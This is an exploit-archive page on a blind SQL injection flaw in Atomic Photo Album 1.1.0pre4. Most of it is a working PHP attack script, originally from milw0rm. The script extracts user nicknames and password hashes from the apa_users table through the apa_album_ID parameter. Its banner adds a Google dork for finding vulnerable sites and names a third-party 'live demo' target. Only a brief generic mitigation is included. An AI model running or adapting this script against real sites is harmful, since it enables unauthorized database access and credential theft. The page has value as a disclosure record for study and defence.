header-logo
Suggest Exploit
vendor:
Atomic Photo Album
by:
Stack
7.5
CVSS
HIGH
Blind SQL Injection
89
CWE
Product Name: Atomic Photo Album
Affected Version From: 1.1.0pre4
Affected Version To: 1.1.0pre4
Patch Exists: NO
Related CWE: N/A
CPE: a:atomic_photo_album:atomic_photo_album:1.1.0pre4
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows, Linux, Mac
2009

Atomic Photo Album 1.1.0pre4 – Blind SQL Injection Exploit

Atomic Photo Album 1.1.0pre4 is vulnerable to Blind SQL Injection. An attacker can exploit this vulnerability to gain access to sensitive information stored in the database. The vulnerability exists due to insufficient sanitization of user-supplied input in the 'apa_album_ID' parameter of the 'lalbum.php' script. An attacker can exploit this vulnerability by sending a specially crafted HTTP request to the vulnerable script. This will allow the attacker to execute arbitrary SQL commands in the context of the application's database.

Mitigation:

Input validation should be used to ensure that user-supplied input is properly sanitized. All input data should be validated and filtered before passing it to the database.
Source

Exploit-DB raw data:

<?php
ini_set("max_execution_time",0);
print_r('
###############################################################
#
#      Atomic Photo Album 1.1.0pre4 - Blind SQL Injection Exploit   
#                                                           
#      Vulnerability discovered by: Stack     
#      Exploit coded by:            Stack
#      Greetz to:                   All My Freind
#
###############################################################
#                                                           
#      Dork:        intext:"Powered by Atomic Photo Album 1.1.0pre4"
#      Admin Panel: [Target]/apa/
#      Usage:       php '.$argv[0].' [Target] [Userid]
#      Example for http://www.site.com/apa/lalbum.php?apa_album_ID=[Real id] 2
#      => php '.$argv[0].' http://www.site.com/apa/album.php?apa_album_ID=2 2
#  Live Demo :
#       http://www.brzi.info/foto/album.php?apa_album_ID=2 1
#                                                           
###############################################################
');
if ($argc > 1) {
$url = $argv[1];
if ($argc < 3) {
$userid = 1;
} else {
$userid = $argv[2];
}
$r = strlen(file_get_contents($url."+and+1=1--"));
echo "\nExploiting:\n";
$w = strlen(file_get_contents($url."+and+1=0--"));
$t = abs((100-($w/$r*100)));
echo "\nNickname: ";
for ($i=1; $i <= 30; $i++) {
$laenge = strlen(file_get_contents($url."+and+ascii(substring((select+nickname+from+apa_users+where+id=".$userid."+limit+0,1),".$i.",1))!=0"));
   if (abs((100-($laenge/$r*100))) > $t-1) {
      $count = $i;
      $i = 30;
   }
}
for ($j = 1; $j < $count; $j++) {
   for ($i = 46; $i <= 122; $i=$i+2) {
      if ($i == 60) {
         $i = 98;
      }
      $laenge = strlen(file_get_contents($url."+and+ascii(substring((select+nickname+from+apa_users+where+id=".$userid."+limit+0,1),".$j.",1))%3E".$i.""));
      if (abs((100-($laenge/$r*100))) > $t-1) {
         $laenge = strlen(file_get_contents($url."+and+ascii(substring((select+nickname+from+apa_users+where+id=".$userid."+limit+0,1),".$j.",1))%3E".($i-1).""));
         if (abs((100-($laenge/$r*100))) > $t-1) {
            echo chr($i-1);
         } else {
            echo chr($i);
         }
         $i = 122;
      }
   }
}
echo "\nPassword: ";
for ($j = 1; $j <= 32; $j++) {
   for ($i = 46; $i <= 102; $i=$i+2) {
      if ($i == 60) {
         $i = 98;
      }
      $laenge = strlen(file_get_contents($url."+and+ascii(substring((select+password+from+apa_users+where+id=".$userid."+limit+0,1),".$j.",1))%3E".$i.""));
      if (abs((100-($laenge/$r*100))) > $t-1) {
         $laenge = strlen(file_get_contents($url."+and+ascii(substring((select+password+from+apa_users+where+id=".$userid."+limit+0,1),".$j.",1))%3E".($i-1).""));
         if (abs((100-($laenge/$r*100))) > $t-1) {
            echo chr($i-1);
         } else {
            echo chr($i);
         }
         $i = 102;
      }
   }
}
} else {
echo "\nExploiting failed: By Stack\n";
}
?>

# milw0rm.com [2008-09-26]

Navigation

Suggest Exploit

Services By CQR